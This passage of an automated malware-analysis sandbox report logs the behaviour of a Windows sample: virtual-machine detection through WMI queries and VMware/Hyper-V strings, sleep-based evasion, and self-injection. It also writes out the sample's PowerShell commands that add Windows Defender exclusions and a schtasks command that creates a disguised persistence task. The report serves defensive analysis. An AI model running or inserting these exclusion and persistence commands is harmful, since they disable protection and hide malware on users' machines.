          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: NnXVkDOvj.exe PID: 7188, type: MEMORYSTR
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 94F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 7E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: A4F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: B4F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 1810000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 3040000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 31F0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 51F0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 9140000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 7C60000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: A140000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: B140000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: EE0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: 2A50000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory allocated: EE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5757Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4022Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7492Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2164Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2295Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7524Jump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWindow / User API: threadDelayed 2424
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWindow / User API: threadDelayed 7419
          Source: C:\Users\user\Desktop\file.exe TID: 7544Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 1256Thread sleep time: -29514790517935264s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe TID: 7304Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe TID: 7720Thread sleep time: -33204139332677172s >= -30000s
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeThread delayed: delay time: 922337203685477
          Source: NnXVkDOvj.exe, 0000000D.00000002.1461950362.000000000768F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
          Source: file.exe, 00000000.00000002.1410116787.00000000040D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1415520757.0000000007C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: rbestdaU7KIHgfSJwns
          Source: NnXVkDOvj.exe, 0000000D.00000002.1461950362.000000000768F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016BD1F8 LdrInitializeThunk,12_2_016BD1F8
          Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeMemory written: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp"
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeProcess created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe"
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
